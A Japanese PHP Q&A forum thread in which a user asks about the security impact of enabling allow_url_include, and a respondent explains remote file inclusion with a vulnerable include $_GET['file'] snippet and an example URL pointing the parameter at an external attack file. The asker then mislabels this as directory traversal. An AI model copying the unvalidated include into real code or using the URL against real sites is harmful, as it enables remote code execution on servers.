allow_url_include - PHPプロ！Q&A掲示板

300P

allow_url_include

allow_url_includeをONにすると、どのようなセキュリティに影響を及ぼすのでしょうか？

質問者: JJkbs
質問日: 2006年8月3日 00時11分

この質問への意見の募集は締め切られ、ポイントは既に配分されました。
意見を投稿することはできますが、ポイントを受け取ることはできません。

この質問に返信

allow_url_include　JJkbs　　[08月03日 00時11分]　

Re:allow_url_include　tmogmni　　[08月03日 00時53分]　

Re[2]:　JJkbs　　[08月26日 06時07分]　

コメント一覧

並び替え（ ツリー順 / 投稿順[降順] / 投稿順[昇順] ）

Re:allow_url_include

マニュアルを見るとphp6から設定可能とのことなので試していませんが、
　
<?php
　include $_GET['file'];
?>
　
とかいうinclude.phpがあった場合、　
http://www.example.com/include.php?file=http://どこか外部サイトの/攻撃用.txt
とすることで、include.phpは
　
<?php
　include 'http://どこか外部サイトの/攻撃用.txt';
?>
　
となり、攻撃用.txtが読み込まれてしまうと思います。

tmogmni [8月3日 00:53]

この意見に返信　　

Re[2]:

ご回答ありがとうございました。
ディレクトリトラバーサルの危険性が増す訳ですね。

それと、ちょっと調べたのですがこれってallow_url_fopenのinclude/requireを別にしたものなんですね。

JJkbs [8月26日 06:07]

この意見に返信　　

allow_url_includePHPプロ！Q&A掲示板

共通メニュー

サイト内検索

Q&A掲示板メニュー

PHP講座新着情報

ニュース新着情報

Q&A掲示板新着情報

300P

allow_url_include

コメント一覧

allow_url_includePHPプロ！Q&A掲示板

共通メニュー

サイト内検索

Q&A掲示板 メニュー

ログイン

PHP講座 新着情報

ニュース 新着情報

Q&A掲示板 新着情報

携帯 SSL

鉄道模型

PHP 暗号化

Webシステム開発

300P allow_url_include

コメント一覧

Q&A掲示板メニュー

PHP講座新着情報

ニュース新着情報

Q&A掲示板新着情報

300P

allow_url_include